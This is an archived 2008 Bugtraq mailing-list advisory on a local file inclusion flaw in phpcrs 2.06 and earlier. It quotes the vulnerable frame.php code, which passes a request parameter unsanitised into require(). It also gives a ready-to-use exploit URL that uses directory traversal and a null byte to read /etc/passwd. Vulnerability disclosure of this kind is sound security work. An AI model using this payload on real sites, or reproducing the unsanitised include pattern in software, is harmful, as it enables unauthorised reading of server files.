lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <615c86240810221444k30b8faedq61e247bdb51acca5@mail.gmail.com>
Date: Wed, 22 Oct 2008 23:44:55 +0200
From: Pepelux <pepelux@...e-sec.org>
To: bugtraq@...urityfocus.com, bugtraq-owner@...urityfocus.com
Subject: phpcrs <= 2.06 / Local File Inclusion Vulnerability (this is the correct :)

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
phpcrs <= 2.06 / Local File Inclusion Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

$ Program: phpcrs
$ Version: <= 2.06
$ File affected: frame.php
$ Download: http://sourceforge.net/projects/phpcrs/


Found by Pepelux <pepelux[at]enye-sec.org>
eNYe-Sec - www.enye-sec.org


--Bug --

151.	elseif( isset( $btnStartImport  ) ) {
152.   		require("../inc/frmDoImport.inc.php");
153. 		require("../inc/". $importFunction .".inc.php");
154.		require("../inc/inc/getFunctions.inc.php");
155.		$importFunction();
156.		frmDoImport( $selectedImport );
157.	}


-- Exploit --

http://site.com/frame.php?btnStartImport=xxx&importFunction=../../../../../etc/passwd%00

NOTE: website only works with Firefox. To navigate you must use
Firefox and to exploit
it, you only have to change the user-agent.

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ